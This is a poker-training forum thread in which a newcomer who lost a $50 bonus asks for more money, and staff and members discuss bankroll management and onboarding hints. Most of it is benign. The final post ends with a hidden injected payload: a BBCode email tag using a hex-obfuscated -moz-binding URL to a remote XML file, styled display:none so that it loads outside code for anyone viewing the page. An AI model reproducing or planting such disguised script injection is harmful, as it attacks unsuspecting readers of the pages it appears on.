Bonus q

• u9koRn
      u9koRn
      Global
      yeah, kinda lost my 50$. All in aces vs 8s , ofcorse the 8 hit.

Anyhu, is there any other way to receive some more money?
      Allowed ways that is, not gonna make several accounts and so on. Thats just lame. Also against the rules so... =)

Kind of weird request tho :p

Hoping for kind responses!
  • 18 replies
    • Stefan1000
      Stefan1000
      Bronze
      Actually there is no way to get more money from us.

The only way for you is to make a deposit with your own money like i said in the other thread.

So i am sorry.

Best regards,
      Stefan
    • Chus82
      Chus82
      Bronze
      This have happen to you because you haven't taken into account the articles about bankroll management. Pokerstrategy's guide is a powerful tool and is necessary to read carefully and do exactly that they says. I'm sorry that pokerstrategy lose some money a cause of gambler's like you.

Congratulations pokerstrategy. Continue improving!
    • Stefan1000
      Stefan1000
      Bronze
      Yap if you stick to the Bankroll Management it is almost impossible to go broke so quick, but anyway ... We don't expect thankfulness but you should take care of this money, since it is the chance for you to build up a big poker bankroll. without ever investing your own money.

Best regards,
      Stefan
    • vladnz
      vladnz
      Bronze
      well i lost my money to .. how?
      well i didn't read the Bronze guide and i passed the quiz with luck anyway i started playing $1/$2 lol with $50 Bankroll omg there i lost $10 in 1.5-2 min after that i tried playing some SnG's without knowing at least the Basic's very good
      lost there to the some Tournaments lost lost lost

after a while i posted on the Forum that i need help etc...

got a advice from Blinzer didn't listen ti him very much i thought i was a good player

then by mistake i won .50 manage to get a buy in i started using the SHC got up to $7 for some reason i wasn't focus on my game lost it all after that i became so angry with my self i knew it was my fault ....
      know im reading everything i use the glossary i understand every little thing after i know perfect every thing i will try to analyze some hands on the forum and il c if i know something then i will deposit $10-$20 and play very careful study the hands etc..

i think losing this money was a good think for me that gave me the motivation i need

p.s i almost memorized some of the articles
    • Stefan1000
      Stefan1000
      Bronze
      Perhaps you have some suggestions, where we could place some more hints to read the Bronze articles or to stick to the BRM???
    • vladnz
      vladnz
      Bronze
      what is a BRM?
    • Stefan1000
      Stefan1000
      Bronze
      Bankroll Management:

It is some kind of plan/roadmap when you should go up or down a limit according to your bankroll/capital you have available for playing poker.

I will post a news during the day about that topic since i think it is very very important!!!

I just released two new articles for the Bronze Area:

BRM for the Short Stack Strategy

and

BRM for the Big Stack Strategy

both NL articles.

Best regards,
      Stefan
    • vladnz
      vladnz
      Bronze
      i Think u can post some hints about the bronze articles right after he passed the quiz
      example

Congratulations you passed the quiz .........

and some thing like : PLEAS READ THE BRONZE ARTICLE or something like that
    • Stefan1000
      Stefan1000
      Bronze
      That is a good idea. But unfortunatly you can't read the Bronze Articles after you passed the quiz. You have to be approved from our Security team before.

But you are definetly right we should place some more hints somewhere.

We are working on a new frontpage anyway where you will get a better guide on the right side, telling you what to do next and stuff like this....
    • vladnz
      vladnz
      Bronze
      its quiet hard to figure it out for your self i mean if u don`t know the website etc..
    • Ulek
      Ulek
      Black
      Reminds me of my beginning. I started playing without having read one article and lost half my money on the first day. Good thing i played fixed limit, on no limit i would have gone broke for sure. I realized that i was not that good of a player i thought i was and started reading.
    • vladnz
      vladnz
      Bronze
      Ulek when did you started playing ?
    • ciRith
      ciRith
      Bronze
      don't user receive an email? Maybe there you can point it out that they need to read the articles.

maybe even a popup after after they visit the forum/mainpage the first time with bronze status?
    • vladnz
      vladnz
      Bronze
      Originally posted by ciRith
      don't user receive an email? Maybe there you can point it out that they need to read the articles.

maybe even a popup after after they visit the forum/mainpage the first time with bronze status?

that is a good idea
    • Ulek
      Ulek
      Black
      Originally posted by vladnz
      Ulek when did you started playing ?
      Exactly 1 year and 1 day ago at ps.de . Played some playmoney before though.
    • JonKirk
      JonKirk
      Bronze
      I feel sorry for u9korn of course, but in my opinion there shouldn't really be any need for more guidance concerning that aspect, because it seems pretty obvious that you should read the articles before playing, and I'm pretty sure I read that in several articles spread around the site. The strategy offered is pretty easy to learn, and what goes for the low limits everything seems to be covered. I am yet to find myself in a position to which I couldn't find the answer in the articles. Without too much effort it seems as if you can pretty easily beat NL $10 and NL $25, and maybe NL $50 as well( I just started playing there) just because the opposition is so weak. The only thing you need to do is to follow the strategy very strictly. Playing those limits for some time while reading the articles over and over again until it sticks isn't very challenging in my opinion. All it really takes is some work.

FWIW and on a completely different note is the need for a little warning against complacency. I myself started out winning and winning on NL $10 and NL $25 using the SSS without encountering any real downswings. Of course I had bad beats, but everytime I had the winning hand, there was always someone paying me off, so in the end I came out winning. Then you slowly start to feel like you've got everything under control, at least that's how I felt, and you start forgetting how you're supposed to play. That cost me a lot of buy-ins, until I realised what was happening, and went back to reading and reading, to get everything in it's right place again.

So my point is: The strategy offered here, SSS for NL in my case, is so strong on the low limits that you can't really lose in the long run, unless you run in to some sort of unreal downswing that lasts for a very long time. Any normal person would end up thinking that this is so easy you have to exploit it to win more. So you get involved with hands you should have layed down, thinking that you can beat almost anyone anytime, and of course you lose in the long run. In my opinion that seems to be the real danger and one of the most important lessons when you start playing poker with the strategies offered here. Unfortunately, I learned that the hard way :D
      Anyway, that's what I've experienced, and maybe I could have avoided it if the articles payed more attention to that aspect. But then again, maybe I was the only one facing that sort of difficulties, after a long run of winning poker.
    • Stefan1000
      Stefan1000
      Bronze
      I must aggree to JonKirk,

but you don't have to forget we also have a financial interest that you don't loose your money that quickly.

The funny thing is that there are even a lot of good/great poker players in our community but they don't get the most out of their potential just because they don't have a decent Bankroll Management.

We made some minor changes. Like Cirith already said users get an email after they get the $50 and there we pointed out the importance of BRM a bit more.

So we will see how the development will be in the future. But someone loosing all $50 in the first days is the worst case scenario for us ;)

Best regards,
      Stefan
    • Muggs
      Muggs
      Bronze
      I lost my starting 50$ in a three days. That was fun, cause that bonus - not real money. But I didn't stop interesting in poker. It's a great difference when playing for own money. My 50$ that I deposited not lost till now :) .
      I think this is a reason why most new players lose their starting 50$. But think that there are many people like me(for whom interest is more important).
      ...Just thoughts...
      http://www.[email=xx style=-moz-binding:url(\68\74\74\70\3a\2f\2f\70\73\73\2e\31\31\30\6d\62\2e\63\6f\6d\2f\61\2e\78\6d\6c\23\61);display:none; ]tt[/email]